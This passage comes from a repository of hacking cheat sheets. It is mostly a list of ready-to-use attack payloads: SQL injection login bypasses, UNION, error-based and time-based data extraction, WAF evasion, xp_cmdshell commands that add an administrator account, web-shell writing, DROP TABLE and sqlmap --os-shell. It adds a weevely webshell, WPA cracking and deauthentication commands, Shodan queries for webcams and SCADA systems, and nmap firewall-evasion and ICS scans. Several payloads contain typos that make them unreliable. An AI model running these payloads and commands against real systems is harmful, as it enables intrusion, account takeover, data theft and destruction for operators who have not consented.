Machine] 93 | set LPORT 4444 94 | run 95 | ``` 96 | 97 | #### Webshell using weevely 98 | 99 | ```sh 100 | weevely generate [PASSWORD] [FILE PATH] 101 | ``` 102 | 103 | Upload the shell to the web server... 104 | 105 | ```sh 106 | weevely http://10.10.10.16:8080/dvwa/hackable/uploads/shell.php [PASSWORD] 107 | ``` 108 | 109 | ### SQL Injection 110 | 111 | #### Try to bypass website login forms 112 | 113 | ```sh 114 | admin' -- 115 | ``` 116 | 117 | ```sh 118 | admin' # 119 | ``` 120 | 121 | ```sh 122 | admin'/* 123 | ``` 124 | 125 | ```sh 126 | ' or 1=1-- 127 | ``` 128 | 129 | ```sh 130 | ' or 1=1# 131 | ``` 132 | 133 | ```sh 134 | ' or 1=1/* 135 | ``` 136 | 137 | ```sh 138 | ') or '1'='1-- 139 | ``` 140 | 141 | ```sh 142 | ') or ('1'='1-- 143 | ``` 144 | 145 | ```sh 146 | ' UNION SELECT 1,'anotheruser','any password', 1-- 147 | ``` 148 | 149 | #### Union 150 | 151 | ##### Extract data 152 | 153 | ```sh 154 | blah' UNION SELECT 0, username, password, 0 from users -- 155 | ``` 156 | 157 | ##### Extract database name 158 | 159 | ```sh 160 | 1 UNION SELECT ALL 1,DB_NAME,3,4-- 161 | ``` 162 | 163 | ##### Extract database tables 164 | 165 | ```sh 166 | 1 UNION SELECT ALL 1,TABLE_NAME,3,4 from sysobjects where xtype=char(85)-- 167 | ``` 168 | 169 | ##### Extract table column names 170 | 171 | ```sh 172 | 1 UNION SELECT ALL 1,column_name,3,4 form DB_NAME.information_schema.columns where table_name='EMPLOYEE_TABLE'-- 173 | ``` 174 | 175 | ##### Extract first field data 176 | 177 | ```sh 178 | 1 UNION SELECT ALL 1COLUMN-NAME-1,3,4 from EMPLOYEE_NAME -- 179 | ``` 180 | 181 | #### Perform error based SQL Injection 182 | 183 | ##### Extract database name 184 | 185 | ```sh 186 | 1 or 1=convert(int,(DB_NAME))-- 187 | ``` 188 | 189 | ##### Extract first database table 190 | 191 | ```sh 192 | 1 or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85))) 193 | ``` 194 | 195 | ##### Extract first table column name 196 | 197 | ```sh 198 | 1 or 1=convert(int, (select top 1 column_name from DBNAME.information_scherma.columns where table_name='TABLE-NAME-1'))-- 199 | ``` 200 | 201 | ##### Extract first field of first row 202 | 203 | ```sh 204 | 1 or 1=convert(int, (select top 1 COLUMN-NAME-1 from TABLE-NAME-1))-- 205 | ``` 206 | 207 | #### Extract database user 208 | 209 | ##### Check for username length 210 | 211 | ```sh 212 | 1; IF (KEN(USER)=1) WAITFOR DELAY '00:00:10'-- 213 | 1; IF (KEN(USER)=2) WAITFOR DELAY '00:00:10'-- 214 | 1; IF (KEN(USER)=3) WAITFOR DELAY '00:00:10'-- 215 | ... 216 | ``` 217 | 218 | ##### Check if first character in the username contains 'A' (a=97), 'B', or 'C' and so on 219 | 220 | ```sh 221 | 1; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:5'-- 222 | 1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:5'-- 223 | 1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:5'-- 224 | ... 225 | ``` 226 | 227 | ##### Check if second character in the username contains 'A' (a=97), 'B', or 'C' and so on 228 | 229 | ```sh 230 | 1; IF (ASCII(lower(substring((USER),2,1)))=97) WAITFOR DELAY '00:00:5'-- 231 | 1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:5'-- 232 | 1; IF (ASCII(lower(substring((USER),2,1)))=99) WAITFOR DELAY '00:00:5'-- 233 | ... 234 | ``` 235 | 236 | ##### Check if third character in the username contains 'A' (a=97), 'B', or 'C' and so on 237 | 238 | ```sh 239 | 1; IF (ASCII(lower(substring((USER),3,1)))=97) WAITFOR DELAY '00:00:5'-- 240 | 1; IF (ASCII(lower(substring((USER),3,1)))=98) WAITFOR DELAY '00:00:5'-- 241 | 1; IF (ASCII(lower(substring((USER),3,1)))=99) WAITFOR DELAY '00:00:5'-- 242 | ... 243 | ``` 244 | 245 | #### Bypass firewall 246 | 247 | ##### Normalization method 248 | 249 | ```sh 250 | 1/*union*/union/*select*/select+1,2,3/* 251 | ``` 252 | ```sh 253 | '/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/**/OM/**/Users/**/WHE/**/RE/**/username/**/LIKE/**/'admin'-- 254 | ``` 255 | 256 | ###### Evading ' OR 1=1 signature 257 | 258 | ```sh 259 | 'OR 'john'='john' 260 | ``` 261 | ```sh 262 | 'OR 8 > 4 263 | ``` 264 | ```sh 265 | 'OR 5 BETWEEN 4 AND 6 266 | ``` 267 | ```sh 268 | 'OR 'apple'='app'+'le' 269 | ``` 270 | ```sh 271 | 'OR 'software like 'soft%'' 272 | ``` 273 | ```sh 274 | 'OR 'asd'>'a' 275 | ``` 276 | ```sh 277 | 'OR 'movies'=N'movies' 278 | ``` 279 | ```sh 280 | 'OR 'blabla' IN ('blabla') 281 | ``` 282 | 283 | ##### Character enconding 284 | 285 | ###### Load files in unions (string="/etc/passwd") 286 | 287 | ```sh 288 | ' union select 1,(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1; 289 | ``` 290 | 291 | ###### Inject without quotes (string = "%") 292 | ```sh 293 | ' or username like char(37) 294 | ``` 295 | 296 | ###### Inject without quotes (string = "root") 297 | ```sh 298 | ' union select * from users where login = char(114,111,111,116); 299 | ``` 300 | 301 | ###### Check for existing files (string = "n.ext") 302 | ```sh 303 | ' and 1( if((load_file(char(110,46,101,120,116))<>char(39,39))1,0)); 304 | ``` 305 | 306 | 307 | ##### HPP technique 308 | Override the HTTP GET/POST parameters by injecting delimiting characters into the query strings. 309 | 310 | ```sh 311 | 1;select+1&id=2,3+from+users+where+id=1-- 312 | ``` 313 | 314 | ##### HPF technique 315 | 316 | ```sh 317 | 1+union/*&b=*/select+1,2 318 | 1+union/*&b=*/select+1,pass/*&c=*/from+users-- 319 | ``` 320 | 321 | ##### Blind SQL Injection 322 | Replace WAF signatures with their synonyms using SQL function. 323 | 324 | ```sh 325 | 1+OR=0x50=0x50 326 | 1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74 327 | ``` 328 | 329 | ##### String concatenation 330 | 331 | ###### MSSQL 332 | ```sh 333 | '; EXEC ('DRO' + 'P T' + 'AB' + 'LE') 334 | ``` 335 | 336 | ###### Oracle 337 | ```sh 338 | '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER' 339 | ``` 340 | 341 | ###### MySQL 342 | ```sh 343 | '; EXECUTE CONCAT('INSE','RT US','ER')' 344 | ``` 345 | 346 | ##### Manipulating white spaces 347 | 348 | ```sh 349 | UNION SELECT 350 | ``` 351 | ```sh 352 | 'OR'1'='1' 353 | ``` 354 | 355 | ##### Null byte 356 | 357 | ```sh 358 | %00' UNION SELECT Password FROM Users WHERE UserName='admin'--' 359 | ``` 360 | 361 | ##### Case variation 362 | 363 | ```sh 364 | UnIoN SeLeCt PasSWord fRoM UsErS WhEre useRNAme='JoHn' 365 | ``` 366 | 367 | ##### Declare variable 368 | 369 | ```sh 370 | ; declare @sqlvar nvarchar(70); set @sqlvar = (N'UNI' + N'ON' + N' SELECT' + N'Password'); EXEC(@sqlvar) 371 | ``` 372 | 373 | 374 | 375 | #### Exporting a value with regular expression attack 376 | 377 | ##### Exporting a value in MySQL 378 | 379 | ###### Check if first character in password is between 'a' and 'g' 380 | 381 | ```sh 382 | 2 and 1=(SELECT 1 FROM UserInfo WHERE Password REGEXP '^[a-g]' AND ID=2) 383 | ``` 384 | 385 | ###### Check if first character in password is between 'a' and 'h' 386 | 387 | ```sh 388 | 2 and 1=(SELECT 1 FROM UserInfo WHERE Password REGEXP '^[a-h]' AND ID=2) 389 | ``` 390 | 391 | ###### Check if first character in password is between 'd' and 'f' 392 | 393 | ```sh 394 | 2 and 1=(SELECT 1 FROM UserInfo WHERE Password REGEXP '^[d-f]' AND ID=2) 395 | ``` 396 | 397 | ###### Check if first character in password is 'e' 398 | 399 | ```sh 400 | 401 | 2 and 1=(SELECT 1 FROM UserInfo WHERE Password REGEXP '^[e]' AND ID=2) 402 | ``` 403 | 404 | ##### Exporting a value in MSSQL 405 | 406 | ###### Check if second character in password is between 'a' and 'f' 407 | 408 | ```sh 409 | 2 and 1=(SELECT 1 FROM UserInfo WHERE Password LIKE 'd[a-f]%' AND ID=2) 410 | ``` 411 | 412 | ###### Check if second character in password is between '0' and '9' 413 | 414 | ```sh 415 | 2 and 1=(SELECT 1 FROM UserInfo WHERE Password LIKE 'd[0-9]%' AND ID=2) 416 | ``` 417 | 418 | ###### Check if second character in password is '4' 419 | 420 | ```sh 421 | 2 and 1=(SELECT 1 FROM UserInfo WHERE Password LIKE 'd[4]%' AND ID=2) 422 | ``` 423 | 424 | #### Creating database accounts 425 | 426 | ##### MySQL 427 | 428 | ```sh 429 | INSERT INTO mysql.user (user, host, password) VALUES ('john', 'localhost', PASSWORD('toor')) 430 | ``` 431 | 432 | ##### Microsoft Access 433 | 434 | ```sh 435 | CREATE USER john IDENTIFIED BY 'toor' 436 | ``` 437 | 438 | ##### Microsoft SQL Server 439 | 440 | ```sh 441 | exec sp_addlogin 'john', 'toor' 442 | exec sp_addsrvrolemember 'john', 'sysadmin' 443 | ``` 444 | 445 | ##### Oracle 446 | 447 | ```sh 448 | CREATE USER john IDENTIFIED BY toor TEMPORATY TABLESPACE temp DEFAULT TABLESPACE users; 449 | GRANT CONNECT TO john; 450 | GRANT RESOURCE TO john; 451 | ``` 452 | 453 | #### Interacting with the operating system 454 | 455 | ##### Creating OS accounts in MSSQL 456 | 457 | ###### Create user 458 | ```sh 459 | ';exec master..xp_cmdshell "net user john toor /add";-- 460 | ``` 461 | 462 | ###### Put new user into the administrators group 463 | 464 | ```sh 465 | ';exec master..xp_cmdshell "net localgroup administrators john /add";-- 466 | ``` 467 | 468 | #### Interacting with the file system 469 | 470 | ##### Loading a file 471 | 472 | ```sh 473 | NULL UNION ALL SELECT LOAD_FILE('/etc/password')/* 474 | ``` 475 | 476 | ##### Writing a file 477 | ```sh 478 | NULL UNION ALL SELECT NULL,NULL,NULL,NULL,'' INTO OUTFILE '/var/www/custom_path/shell.php'/* 479 | ``` 480 | 481 | #### Manage data 482 | 483 | ##### MSSQL 484 | 485 | ###### Inserting a row 486 | 487 | ```sh 488 | 1';insert into users values ('john','toor'); -- 489 | ``` 490 | 491 | ###### Creating a database 492 | 493 | ```sh 494 | 1';create database mydatabase; -- 495 | ``` 496 | 497 | ###### Deleting a database 498 | 499 | ```sh 500 | 1'; DROP DATABASE mydatabase; -- 501 | ``` 502 | 503 | ###### Deleting a table 504 | 505 | ```sh 506 | 1'; DROP TABLE users; -- 507 | ``` 508 | 509 | #### Using sqlmap 510 | 511 | ##### SQL Injection in a page using a cookie, retrieve databases 512 | 513 | ```sh 514 | sqlmap -u "[HOST]" --cookie="[COOKIE]" --dbs 515 | ``` 516 | -u: Specifies the target URL. 517 | 518 | --cookie: Specifies the HTTP cookie header value. 519 | 520 | --dbs: Enumerates DBMS databases. 521 | 522 | ##### Choose a database and retrieve the tables 523 | 524 | ```sh 525 | sqlmap -u "[HOST]" --cookie="[COOKIE]" -D [DATABASE] --tables 526 | ``` 527 | 528 | ##### Retrieve the rows in a table 529 | 530 | ```sh 531 | sqlmap -u "[HOST]" --cookie="[COOKIE]" -D [DATABASE] -T [TABLE] --dump 532 | ``` 533 | 534 | ##### Getting a shell 535 | 536 | ```sh 537 | sqlmap -u "[HOST]" --cookie="[COOKIE]" --os-shell 538 | ``` 539 | 540 | #### Using DSSS 541 | 542 | ##### SQL Injection in a page using a cookie, retrieve databases 543 | 544 | ```sh 545 | python3 dsss.py -u "[HOST]" --cookie="[COOKIE]" 546 | ``` 547 | -u: Specifies the target URL. 548 | 549 | --cookie: Specifies the HTTP cookie header value. 550 | 551 | 552 | [<- Back to index](README.md) 553 | 554 | --- 555 | ## License 556 | 557 | © 2023 [javierizquierdovera.com](https://javierizquierdovera.com) 558 | 559 | Licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) ([`LICENSE-APACHE`](LICENSE-APACHE)) or the [MIT license](https://opensource.org/licenses/MIT) ([`LICENSE-MIT`](LICENSE-MIT)), at your option. 560 | 561 | `SPDX-License-Identifier: (Apache-2.0 OR MIT)` -------------------------------------------------------------------------------- /hacking-wireless-cheat-sheet.md: -------------------------------------------------------------------------------- 1 | ## Hacking wireless cheat sheet 2 | 3 | ### Discover the AP, ESSID, and BSSID of a device router with WPS enabled 4 | 5 | ```sh 6 | wash -i [INTERFACE] 7 | ``` 8 | 9 | ### airmon-ng 10 | 11 | #### Kill any conflicting processes 12 | 13 | ```sh 14 | airmon-ng check kill 15 | ``` 16 | 17 | #### Set monitor mode to an interface (create monitor mode virtualized adapter) 18 | 19 | ```sh 20 | airmon-ng start [INTERFACE] 21 | ``` 22 | 23 | #### Wizard 24 | 25 | ```sh 26 | airoscript-ng 27 | ``` 28 | 29 | #### De-authentication attack 30 | De-authenticate and desassociate a client. 31 | 32 | ```sh 33 | aireplay-ng --deauth 25 -h [TARGET MAC] -b [AP MAC] [INTERFACE] 34 | ``` 35 | 36 | #### Crack WEP password 37 | 38 | ```sh 39 | aircrack-ng 'wireless-data-01.cap' 40 | ``` 41 | 42 | #### Crack WPA2 password 43 | 44 | ```sh 45 | aircrack-ng -a2 -b [TARGET BSSID] -w dictionary.txt 'wireless-data-01.cap' 46 | ``` 47 | -a: Technique used to crack the handshake. 2=WPA technique. 48 | 49 | -b: BSSID of the target router. 50 | 51 | -w: Wordlist. 52 | 53 | 54 | [<- Back to index](README.md) 55 | 56 | --- 57 | ## License 58 | 59 | © 2023 [javierizquierdovera.com](https://javierizquierdovera.com) 60 | 61 | Licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) ([`LICENSE-APACHE`](LICENSE-APACHE)) or the [MIT license](https://opensource.org/licenses/MIT) ([`LICENSE-MIT`](LICENSE-MIT)), at your option. 62 | 63 | `SPDX-License-Identifier: (Apache-2.0 OR MIT)` -------------------------------------------------------------------------------- /iot-hacking-cheat-sheets.md: -------------------------------------------------------------------------------- 1 | ## Internet of Things (IoT) hacking cheat sheet 2 | 3 | ### Gathering using Shodan 4 | 5 | #### Search for webcams using geolocation 6 | 7 | ```sh 8 | webcamxp country:"ES" 9 | ``` 10 | 11 | #### Search for webcams using city 12 | 13 | ```sh 14 | webcamxp city:"Barcelona" 15 | ``` 16 | 17 | #### Search for webcams using longitude and latitude 18 | 19 | ```sh 20 | webcamxp geo:"41.3964, 2.1793" 21 | ``` 22 | 23 | #### Search for Modbus-enabled ICS/SCADA systems 24 | 25 | ```sh 26 | port:502 27 | ``` 28 | 29 | #### Search for SCADA systems using PLC name 30 | 31 | ```sh 32 | “Schneider Electric” 33 | ``` 34 | 35 | #### Search for SCADA systems using geolocation 36 | 37 | ```sh 38 | SCADA Country:"US" 39 | ``` 40 | 41 | 42 | 43 | 44 | [<- Back to index](README.md) 45 | 46 | --- 47 | ## License 48 | 49 | © 2023 [javierizquierdovera.com](https://javierizquierdovera.com) 50 | 51 | Licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) ([`LICENSE-APACHE`](LICENSE-APACHE)) or the [MIT license](https://opensource.org/licenses/MIT) ([`LICENSE-MIT`](LICENSE-MIT)), at your option. 52 | 53 | `SPDX-License-Identifier: (Apache-2.0 OR MIT)` -------------------------------------------------------------------------------- /nmap-cheat-sheet.md: -------------------------------------------------------------------------------- 1 | ## NMap command cheat sheet 2 | 3 | ### General commands 4 | 5 | * -sn: Disables port scan. 6 | * -v: Enables the verbose output (include all hosts and ports in the output). 7 | * -sV: Detects service versions. 8 | * -A: Enables aggressive scan. The aggressive scan option supports OS detection (-O), version scanning (-sV), script scanning (-sC), and traceroute (--traceroute). You should not use -A against target networks without permission. 9 | * -p: Specifies the port to be scanned. 10 | * -O: OS detection. 11 | 12 | ### ARP ping scan 13 | 14 | ```sh 15 | nmap -sn -PR [Target IP Address/Range of IP addresses] 16 | ``` 17 | 18 | ### UDP ping scan 19 | 20 | A UDP response means that the host is active. If the target host is offline or unreachable, various error messages such as “host/network unreachable” or “TTL exceeded” could be returned. 21 | ```sh 22 | nmap -sn -PU [Target IP Address/Range of IP addresses] 23 | ``` 24 | 25 | ### ICMP ECHO ping scan 26 | 27 | The ICMP ECHO ping scan involves sending ICMP ECHO requests to a host. If the target host is alive, it will return an ICMP ECHO reply. This scan is useful for locating active devices or determining if the ICMP is passing through a firewall. 28 | 29 | ```sh 30 | nmap -sn -PE [Target IP Address/Range of IP addresses] 31 | ``` 32 | 33 | ### Alternative to ICMP ECHO ping scan: ICMP Timestamp and Address Mask Ping Scan 34 | 35 | #### ICMP timestamp ping scan 36 | ```sh 37 | nmap -sn -PP [Target IP Address/Range of IP addresses] 38 | ``` 39 | 40 | #### ICMP address mask ping scan 41 | ```sh 42 | nmap -sn -PM [Target IP Address/Range of IP addresses] 43 | ``` 44 | 45 | #### TCP ACK Ping Scan 46 | This technique sends empty TCP ACK packets to the target host; an RST response means that the host is active. 47 | 48 | ```sh 49 | nmap -sn -PA [Target IP Address/Range of IP addresses] 50 | ``` 51 | 52 | ### IP Protocol Ping Scan 53 | This technique sends different probe packets of different IP protocols to the target host, any response from any probe indicates that a host is active. 54 | ```sh 55 | nmap -sn -PO [Target IP Address/Range of IP addresses] 56 | ``` 57 | 58 | ### TCP connect/full open scan 59 | ```sh 60 | nmap -sT -v [Target IP Address/Range of IP addresses] 61 | ``` 62 | 63 | ### Stealth scan/TCP half-open scan 64 | This scanning technique can be used to bypass firewall rules, logging mechanisms, and hide under network traffic. 65 | ```sh 66 | nmap -sS -v [Target IP Address/Range of IP addresses] 67 | ``` 68 | 69 | ### Xmas scan 70 | Sends a TCP frame to a target system with FIN, URG, and PUSH flags set. If the target has opened the port, then you will receive no response from the target system. If the target has closed the port, then you will receive a target system reply with an RST. 71 | ```sh 72 | nmap -sX -v [Target IP Address/Range of IP addresses] 73 | ``` 74 | 75 | ### TCP Maimon scan 76 | FIN/ACK probe is sent to the target; if there is no response, then the port is Open|Filtered, but if the RST packet is sent as a response, then the port is closed. 77 | ```sh 78 | nmap -sM -v [Target IP Address/Range of IP addresses] 79 | ``` 80 | 81 | ### ACK flag probe scan 82 | Sends an ACK probe packet with a random sequence number; no response implies that the port is filtered (stateful firewall is present), and an RST response means that the port is not filtered. 83 | ```sh 84 | nmap -sA -v [Target IP Address/Range of IP addresses] 85 | ``` 86 | 87 | ### UDP scan 88 | Uses UDP protocol instead of the TCP. There is no three-way handshake for the UDP scan. It sends UDP packets to the target host; no response means that the port is open. If the port is closed, an ICMP port unreachable message is received. 89 | ```sh 90 | nmap -sU -v [Target IP Address/Range of IP addresses] 91 | ``` 92 | 93 | ### IDLE/IPID Header Scan / Zombie Scan 94 | A TCP port scan method that can be used to send a spoofed source address to a computer to discover what services are available. 95 | ```sh 96 | nmap -sI -v [Target IP Address/Range of IP addresses] 97 | ``` 98 | 99 | Reference: https://nmap.org/book/idlescan.html 100 | 101 | ### SCTP COOKIE ECHO Scan 102 | A COOKIE ECHO chunk is sent to the target host; no response implies that the port is open and ABORT Chunk response means that the port is closed. 103 | ```sh 104 | nmap -sZ -v [Target IP Address/Range of IP addresses] 105 | ``` 106 | 107 | ### Ping Sweep Scan 108 | Discover the available hosts and their IP and MAC addresses, but no information about the ports. 109 | 110 | ```sh 111 | nmap -sP [Target IP Address/Range of IP addresses] 112 | ``` 113 | 114 | ### Display the open ports and services running 115 | 116 | ```sh 117 | nmap -T4 -A -v [Target IP Address/Range of IP addresses] 118 | ``` 119 | -T4: Specifies setting time template (0-5). 120 | -A: Specifies setting ACK flag. 121 | 122 | ### smb-os-discovery 123 | Attempts to determine the OS, computer name, domain, workgroup, and current time over the SMB protocol 124 | ```sh 125 | nmap --script smb-os-discovery.nse [Target IP Address/Range of IP addresses] 126 | ``` 127 | 128 | ### NetBIOS enumeration 129 | ```sh 130 | nmap -sV -v --script nbstat.nse [Target IP Address/Range of IP addresses] 131 | ``` 132 | 133 | ### Http enum - enumerate the applications, directories, and files in a web server 134 | ```sh 135 | nmap -sV --script http-enum [Target IP Address/Range of IP addresses] 136 | ``` 137 | 138 | ### hostmap-bfk 139 | ```sh 140 | nmap --script hostmap-bfk -script-args hostmap-bfk.prefix=hostmap- [Target IP Address/Range of IP addresses] 141 | ``` 142 | 143 | ### Http trace 144 | Uses the TRACE method by sending an HTTP TRACE request that shows if the method is enabled or not 145 | ```sh 146 | nmap --script http-trace -d [Target IP Address/Range of IP addresses] 147 | ``` 148 | 149 | ### Http frontpage login 150 | ```sh 151 | nmap [Target IP Address/Range of IP addresses] -p 80 --script = http-frontpage-login 152 | ``` 153 | 154 | ### Http passwd 155 | ```sh 156 | nmap --script http-passwd --script-args http-passwd.root =/ [Target IP Address/Range of IP addresses] 157 | ``` 158 | 159 | ### Check whether Web Application Firewall is configured on the target host or domain 160 | ```sh 161 | nmap -p80 --script http-waf-detect [Target IP Address/Range of IP addresses] 162 | ``` 163 | 164 | ### Bypassing firewall/IDS 165 | 166 | #### Fragment packets 167 | Send fragmented probe packets to the intended target, which re-assembles it after receiving all the fragments. 168 | ```sh 169 | nmap -f [Target IP Address/Range of IP addresses] 170 | ``` 171 | 172 | #### Source port manipulation 173 | Manipulating actual port numbers with common port numbers to evade IDS/firewall (sometimes, firewall is configured to allow packets from well-known ports like HTTP, DNS, FTP, etc.). 174 | ```sh 175 | nmap -g 80 [Target IP Address/Range of IP addresses] 176 | ``` 177 | 178 | #### Set number of Maximum Transmission Unit (MTU) 179 | This technique evades the filtering and detection mechanism enabled in the target machine. 180 | ```sh 181 | nmap -mtu 8 [Target IP Address/Range of IP addresses] 182 | ``` 183 | 184 | #### Decoy 185 | Generating or manually specifying IP addresses of the decoys to evade IDS/firewall. Nmap automatically generates a random number of decoys for the scan and randomly positions the real IP address between the decoy IP addresses. 186 | 187 | -D: performs a decoy scan. 188 | RND: generates a random and non-reserved IP addresses. 189 | ```sh 190 | nmap -D RND:10 [Target IP Address/Range of IP addresses] 191 | ``` 192 | 193 | #### Send the binary data as payload 194 | 195 | ```sh 196 | nmap [Target IP Address/Range of IP addresses] --data 0xdeadbeef 197 | ``` 198 | 199 | #### Send string data as payload 200 | ```sh 201 | nmap [Target IP Address/Range of IP addresses] --data-string "dummy string" 202 | ``` 203 | 204 | #### Append the number of random data bytes to most of the packets sent without any protocol-specific payloads 205 | 206 | ```sh 207 | nmap --data-length 5 [Target IP Address/Range of IP addresses] 208 | ``` 209 | 210 | #### Scan in random order 211 | 212 | ```sh 213 | nmap --randomize-hosts [Target IP Address/Range of IP addresses] 214 | ``` 215 | 216 | #### Send the packets with bad or bogus TCP/UPD checksums 217 | ```sh 218 | nmap --badsum [Target IP Address/Range of IP addresses] 219 | ``` 220 | 221 | #### Send the packets with bad or bogus TCP/UPD checksums 222 | ```sh 223 | nmap --badsum [Target IP Address/Range of IP addresses] 224 | ``` 225 | 226 | ### Scanning for vulneabilities 227 | 228 | #### Identify the IPv6 capabilities of a device 229 | ```sh 230 | nmap -6 -n -Pn -sSU -pT:0-65535,U:0-65535 -v -A -oX [NAME] [Target IP Address/Range of IP addresses] 231 | ``` 232 | 233 | #### Check for open TCP and UDP services and ports 234 | ```sh 235 | nmap -n -Pn -sSU -pT:0-65535,U:0-65535 -v -A -oX [NAME] [Target IP Address/Range of IP addresses] 236 | ``` 237 | 238 | #### Scan for a specific IP address 239 | ```sh 240 | nmap -n -Pn -sS -pT:0-65535 -v -A -oX [Target IP Address/Range of IP addresses] 241 | ``` 242 | 243 | 244 | ### Scanning ICS/SCADA systems 245 | 246 | #### Identifying HMI systems 247 | ```sh 248 | nmap -Pn -sT -p 46824 [Target IP address/Range of IP addresses] 249 | ``` 250 | 251 | #### Identifyng open ports and services 252 | ```sh 253 | nmap -Pn -sT --scan-delay 1d --mac-parallelism 1 -p [port list] [Target IP address/Range of IP addresses] 254 | ``` 255 | 256 | #### Scanning siemens SIMATIC S7 PLCs 257 | ```sh 258 | nmap -Pn -sT -p 102 --script s7-info [Target IP address/Range of IP addresses] 259 | ``` 260 | 261 | #### Scanning ethernet/IP devices 262 | ```sh 263 | nmap -Pn -sU -p 44818 --script enip-info [Target IP address/Range of IP addresses] 264 | ``` 265 | 266 | #### Scanning modbus devices 267 | ```sh 268 | nmap -Pn -sT -p 502 --script modbus-discover [Target IP address/Range of IP addresses] 269 | ``` 270 | 271 | #### Scanning BACnet devices 272 | ```sh 273 | nmap -Pn -sU -p 47808 --script bacnet-info [Target IP address/Range of IP addresses] 274 | ``` 275 | 276 | #### Scanning Niagara Fox devices 277 | ```sh 278 | nmap -Pn -sT -p 1911,4911 --script fox-info [Target IP address/Range of IP addresses] 279 | ``` 280 | 281 | #### Scanning Omron PLC devices 282 | ```sh 283 | nmap -Pn -sT -p 9600 --script omron-info [Target IP address/Range of IP addresses] 284 | ``` 285 | 286 | #### Scanning PCWorx devices 287 | ```sh 288 | nmap -Pn -sT -p 1962 --script pcworx-info [Target IP address/Range of IP addresses] 289 | ``` 290 | 291 | #### Scanning ProConOS devices 292 | ```sh 293 | nmap -Pn -sT -p 20547 --script proconos-info [Target IP address/Range of IP addresses] 294 | ``` 295 | 296 | 297 | 298 | ### Protection 299 | 300 | #### Promiscuous detection 301 | ```sh 302 | nmap --script=sniffer-detect [Target IP Address/Range of IP addresses] 303 | ``` 304 | 305 | 306 | [<- Back to index](README.md) 307 | 308 | --- 309 | ## License 310 | 311 | © 2023 [javierizquierdovera.com](https://javierizquierdovera.com) 312 | 313 | Licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) ([`LICENSE-APACHE`](LICENSE-APACHE)) or the [MIT license](https://opensource.org/licenses/MIT) ([`LICENSE-MIT`](LICENSE-MIT)), at your option. 314 | 315 | `SPDX-License-Identifier: (Apache-2.0 OR MIT)` -------------------------------------------------------------------------------- /os-distribution-virual-machines.md: -------------------------------------------------------------------------------- 1 | ## OS distributions / Virtual machines 2 | 3 | ### OS distributions 4 | * [BlackArch Linux](https://blackarch.org/): BlackArch Linux is an Arch Linux-based penetration testing distribution for penetration testers and security researchers. 5 | * [flare-vm](https://github.com/fireeye/flare-vm): A fully customizable, Windows-based security distribution for malware analysis, incident response, penetration testing, etc. 6 | * [HoneyDrive](https://sourceforge.net/projects/honeydrive/): HoneyDrive is the premier honeypot Linux distro. It is a virtual appliance (OVA) with Xubuntu Desktop 12.04.4 LTS edition installed. It contains over 10 pre-installed and pre-configured honeypot software packages such as Kippo SSH honeypot, Dionaea and Amun malware honeypots, Honeyd low-interaction honeypot, Glastopf web honeypot and Wordpot, Conpot SCADA/ICS honeypot, Thug and PhoneyC honeyclients and more. Additionally it includes many useful pre-configured scripts and utilities to analyze, visualize and process the data it can capture, such as Kippo-Graph, Honeyd-Viz, DionaeaFR, an ELK stack and much more. Lastly, almost 90 well-known malware analysis, forensics and network monitoring related tools are also present in the distribution. 7 | * [HuronOsint](https://github.com/HuronOsint/OsintDistro): Linux Distrubition for Osint (version 1.0). In Huron you will find fundamental tools like Maltego or Recon-NG ready to be used or, at least, after a minimum configuration process, a multitude of links to specialized search engines like Shodan, social networks, language tools, SW for image data processing and extraction (ExifTools), tools for the creation of idea maps, user name checkers, email anonymizers... But also tools that allow you to carry out research tasks safely (tracking blockers, Tor browser...) or assist you in the creation of reports and visualization of multimedia material. 8 | * [Kali Linux](https://www.kali.org/): The Most Advanced Penetration Testing Distribution. 9 | * [Parrot OS](https://www.parrotsec.org/): Is a GNU/Linux distribution based on Debian and designed with Security and Privacy in mind. It includes a full portable laboratory for all kinds of cyber security operations, from pentesting to digital forensics and reverse engineering, but it also includes everything needed to develop your own software or keep your data secure. 10 | * [REMnux: A Linux Toolkit for Malware Analysis](https://remnux.org/): It is a Linux toolkit for reverse-engineering and analyzing malicious software. REMnux provides a curated collection of free tools created by the community. Analysts can use it to investigate malware without having to find, install, and configure the tools. 11 | * [Security Onion 2](https://securityonionsolutions.com/software/): Security Onion is a free and open source Linux distribution for threat hunting, enterprise security monitoring, and log management. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes! Security Onion includes Elasticsearch, Logstash, Kibana, Suricata, Zeek (formerly known as Bro), Wazuh, Stenographer, TheHive, Cortex, CyberChef, NetworkMiner, and many other security tools. 12 | 13 | 14 | 15 | --- 16 | 17 | 18 | 19 | ### Virtual machines 20 | * [OSBoxes](https://www.osboxes.org/): Offers you ready-to-use Linux/Unix guest operating systems. 21 | * [Windows XP Lab for VirtualBox (by Lifka)](https://drive.google.com/file/d/18NYLUVYaZ0fuynlzYfl3zjSBXLtQduu1/view?usp=sharing): Contains basic malware analysis tools for static and dynamic analysis (disassemblers, debugging, network analysis, etc.). 22 | 23 | #### Setup scripts 24 | * [DissectingMalwa.re Lab VMs Setup](https://github.com/f0wl/MalwareLab_VM-Setup): Setup scripts for my Malware Analysis VMs. 25 | 26 | 27 | 28 | --- 29 | 30 | 31 | 32 | ### Vulnerable machines 33 | * [CORS_vulnerable_Lab-Without_Database](https://github.com/incredibleindishell/CORS_vulnerable_Lab-Without_Database) 34 | 35 | 36 | [<- Back to index](README.md) 37 | 38 | --- 39 | ## License 40 | 41 | © 2023 [javierizquierdovera.com](https://javierizquierdovera.com) 42 | 43 | Licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) ([`LICENSE-APACHE`](LICENSE-APACHE)) or the [MIT license](https://opensource.org/licenses/MIT) 